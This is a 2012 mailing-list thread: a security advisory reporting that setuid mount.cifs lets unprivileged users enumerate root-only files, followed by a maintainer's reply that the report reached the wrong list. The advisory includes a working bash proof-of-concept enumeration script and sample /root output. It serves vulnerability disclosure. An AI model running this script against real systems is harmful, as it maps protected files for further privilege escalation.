--- Begin Message ---
Subject: |
mount.cifs vulnerability |
Date: |
Wed, 07 Mar 2012 19:33:49 +0100 |
User-agent: |
Mozilla/5.0 (X11; Linux x86_64; rv:8.0) Gecko/20111108 Thunderbird/8.0 |
Hello, here is a bug report for mount.cifs,
is a little security breach on linux permissions by controlling a
privileged chdir()
regards.
########## Blueliv Advisory 2012-004 ##########
- Discovered by: Jesus Olmos Gonzalez
- Risk: 5/5
- Impact: 1/5
####################################
1. VULNERABILITY
-------------------------
linux arbitrary privileged arbitrary chdir(),
this leads to an arbitarry file identification as root.
2. BACKGROUND
-------------------------
mount.cifs (GNU Software) is part of linux base system, and is setuided on
most of the distributions.
This software mounts cifs partition to authorized directories by fstab.
3. DESCRIPTION
-------------------------
Althow there is not authorized cifs mounts, is possible by the second
parameter
to control a privileged chdir() syscall and infer the return value throught
the responses.
This implies, a little security breach on linux permissions. A non root user
can enumerate files and directories as root.
This can help to exploit another vulnerabilities, enumerate /root/ contents,
descriptors used by any process, user homes, etc ...
one of the attack vectors is /root/ directory scan:
address@hidden advs]$ ./root_eye.sh wordlist /root/
--- directories ---
.pulse1
.bash_history
.alsaplayer
.dbus
.mozilla
.VirtualBox
.vim
.links
.config
.cpan
.gnome2
--- files ---
.pulse-cookie
.keystore
.bash_profile
dead.letter
.mysql_history
.Xauthority
.vimrc
.viminfo
secret
Also let to enumerate sub-sub directories in order to dump readable files.
4. PROOF OF CONCEPT
-------------------------
#!/bin/bash
# root enumerator 0day by address@hidden
# discover root protected files & directories, user homes, process
descriptors, ...
path=$2
wordlist=$1
for i in `cat $wordlist`
do
echo -n "$i:"
/sbin/mount.cifs //127.0.0.1/a $path/$i
done 2>log.$$ 1>&2
echo --- directories ---
for i in `grep 'denied' log.$$ | cut -d ':' -f 1`
do
echo $i
done
echo --- files ---
for i in `grep -i 'not a directory' log.$$ | cut -d ':' -f 1`
do
echo $i
done
rm log.$$
5. BUSINESS IMPACT
-------------------------
The confidenciality can be breached,
This method of transfer files, is highly dangerous and can rely on a
remote control of the server
6. SYSTEMS AFFECTED
-------------------------
all versions are affected
7. SOLUTION
-------------------------
The chdir() should be done after the fstab check.
8. REFERENCES
-------------------------
http://gnu.org
9. CREDITS
-------------------------
Jesus Olmos Gonzalez jolmos(at)blueliv(dot)com
BLUELIV
10. DISCOLSURE TIMELINE
-------------------------
February 20, 2012: Vulnerability discovered
March 07, 2012: Reported to the vendor
11. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.
--
Jesus Olmos
address@hidden
Parc Innovació La Salle
C/Sant Joan de la Salle 42, Planta 3
08022 Barcelona
Telf. + 34 902908712
Fax. + 34 933960900
--- End Message ---
--- Begin Message ---
Subject: |
Re: bug#10965: mount.cifs vulnerability |
Date: |
Wed, 07 Mar 2012 11:45:54 -0700 |
User-agent: |
Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20120216 Thunderbird/10.0.1 |
tag 10965 notabug
thanks
On 03/07/2012 11:33 AM, Jesus Olmos wrote:
> Hello, here is a bug report for mount.cifs,
> is a little security breach on linux permissions by controlling a
> privileged chdir()
Thanks for the report, but you have sent it to the wrong list. GNU
coreutils does not maintain mount.cifs, so there is nothing this list
can do about fixing anything. I'm closing the coreutils bug aspect,
although I encourage you to continue pursuing a correct fix with the
correct folks in charge of mount.cifs.
--
Eric Blake address@hidden +1-919-301-3266
Libvirt virtualization library http://libvirt.org
signature.asc
Description: OpenPGP digital signature
--- End Message ---